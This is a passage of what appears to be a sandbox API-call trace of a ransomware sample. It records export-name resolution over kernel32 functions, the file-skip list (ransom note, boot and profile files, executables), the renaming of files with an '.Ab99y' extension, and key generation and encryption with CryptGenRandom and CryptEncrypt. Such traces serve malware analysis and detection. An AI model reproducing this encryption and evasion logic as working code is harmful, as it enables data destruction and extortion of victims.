(lpString="CREATEPROCESSINTERNALA") returned 22 [0087.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.826] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.826] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.826] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.826] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.826] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.826] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.826] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.826] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.826] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.826] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.826] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.826] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.826] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.826] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.827] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.827] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.827] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.827] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.827] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.827] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.827] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.827] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.827] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.827] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.827] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.827] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.827] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.827] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.827] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.827] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.827] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.827] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.827] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.827] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.828] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.828] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.828] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.828] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.828] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.828] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.828] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.828] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0087.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0087.828] lstrlenA (lpString="DELETEATOM") returned 10 [0087.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0087.828] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0087.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0087.828] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0087.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0087.828] lstrlenA (lpString="DELETEFIBER") returned 11 [0087.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0087.828] lstrlenA (lpString="DELETEFILEA") returned 11 [0087.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0087.828] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0087.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0087.828] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0087.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0087.828] lstrlenA (lpString="DELETEFILEW") returned 11 [0087.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0087.828] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0087.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0087.828] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0087.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0087.828] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0087.828] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0087.829] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0087.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0087.829] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0087.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0087.829] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0087.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0087.829] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0087.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0087.829] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0087.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0087.829] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0087.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0087.829] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0087.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0087.829] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0087.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0087.829] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0087.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0087.829] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0087.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0087.829] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0087.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0087.829] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0087.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0087.829] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0087.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0087.829] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0087.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0087.829] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0087.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0087.829] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0087.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0087.829] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0087.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0087.829] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0087.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0087.829] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0087.829] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0087.830] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0087.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0087.830] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0087.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0087.830] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0087.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0087.830] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0087.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0087.830] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0087.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0087.830] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0087.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0087.830] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0087.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0087.830] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0087.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0087.830] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0087.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0087.830] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0087.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0087.830] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0087.830] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0087.830] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0087.830] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TfA5dyz.avi") returned 48 [0087.830] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TfA5dyz.avi.Ab99y") returned 54 [0087.830] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TfA5dyz.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\tfa5dyz.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\TfA5dyz.avi.Ab99y" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\tfa5dyz.avi.ab99y"), dwFlags=0x0) returned 1 [0087.838] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.838] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.839] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.839] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd441ba30, ftCreationTime.dwHighDateTime=0x1d4d116, ftLastAccessTime.dwLowDateTime=0x58073030, ftLastAccessTime.dwHighDateTime=0x1d4cb08, ftLastWriteTime.dwLowDateTime=0x58073030, ftLastWriteTime.dwHighDateTime=0x1d4cb08, nFileSizeHigh=0x0, nFileSizeLow=0x8e8b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voRYC1W8ZezIZ1pk.swf", cAlternateFileName="VORYC1~1.SWF")) returned 1 [0087.839] lstrcmpiW (lpString1="voRYC1W8ZezIZ1pk.swf", lpString2="DECRYPT-FILES.txt") returned 1 [0087.839] lstrcmpiW (lpString1="voRYC1W8ZezIZ1pk.swf", lpString2="autorun.inf") returned 1 [0087.839] lstrcmpiW (lpString1="voRYC1W8ZezIZ1pk.swf", lpString2="boot.ini") returned 1 [0087.839] lstrcmpiW (lpString1="voRYC1W8ZezIZ1pk.swf", lpString2="desktop.ini") returned 1 [0087.839] lstrcmpiW (lpString1="voRYC1W8ZezIZ1pk.swf", lpString2="ntuser.dat") returned 1 [0087.839] lstrcmpiW (lpString1="voRYC1W8ZezIZ1pk.swf", lpString2="iconcache.db") returned 1 [0087.839] lstrcmpiW (lpString1="voRYC1W8ZezIZ1pk.swf", lpString2="bootsect.bak") returned 1 [0087.839] lstrcmpiW (lpString1="voRYC1W8ZezIZ1pk.swf", lpString2="ntuser.dat.log") returned 1 [0087.839] lstrcmpiW (lpString1="voRYC1W8ZezIZ1pk.swf", lpString2="thumbs.db") returned 1 [0087.839] lstrcmpiW (lpString1="voRYC1W8ZezIZ1pk.swf", lpString2="Bootfont.bin") returned 1 [0087.839] lstrlenW (lpString="voRYC1W8ZezIZ1pk.swf") returned 20 [0087.839] lstrcmpiW (lpString1="swf", lpString2="lnk") returned 1 [0087.839] lstrcmpiW (lpString1="swf", lpString2="exe") returned 1 [0087.839] lstrcmpiW (lpString1="swf", lpString2="sys") returned -1 [0087.839] lstrcmpiW (lpString1="swf", lpString2="dll") returned 1 [0087.839] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned 37 [0087.839] lstrlenW (lpString="voRYC1W8ZezIZ1pk.swf") returned 20 [0087.839] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0087.839] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="voRYC1W8ZezIZ1pk.swf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\voRYC1W8ZezIZ1pk.swf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\voRYC1W8ZezIZ1pk.swf" [0087.839] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.840] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\voRYC1W8ZezIZ1pk.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\voryc1w8zeziz1pk.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0087.840] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=36491) returned 1 [0087.840] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0087.840] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0087.840] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0087.841] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0087.841] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.841] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0087.841] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0087.842] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.842] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0087.843] CloseHandle (hObject=0x414) returned 1 [0087.843] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.843] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0087.843] CloseHandle (hObject=0x0) returned 0 [0087.843] CloseHandle (hObject=0x410) returned 1 [0087.844] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.844] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.844] GetTickCount () returned 0x114e679 [0087.844] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0087.844] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0087.844] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0087.845] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0087.845] lstrlenA (lpString="kernel32.dll") returned 12 [0087.845] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0087.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0087.845] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0087.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0087.845] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0087.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0087.845] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0087.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0087.845] lstrlenA (lpString="ADDATOMA") returned 8 [0087.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0087.845] lstrlenA (lpString="ADDATOMW") returned 8 [0087.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0087.845] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0087.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0087.845] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0087.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0087.845] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0087.845] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0087.846] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0087.846] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0087.846] lstrlenA 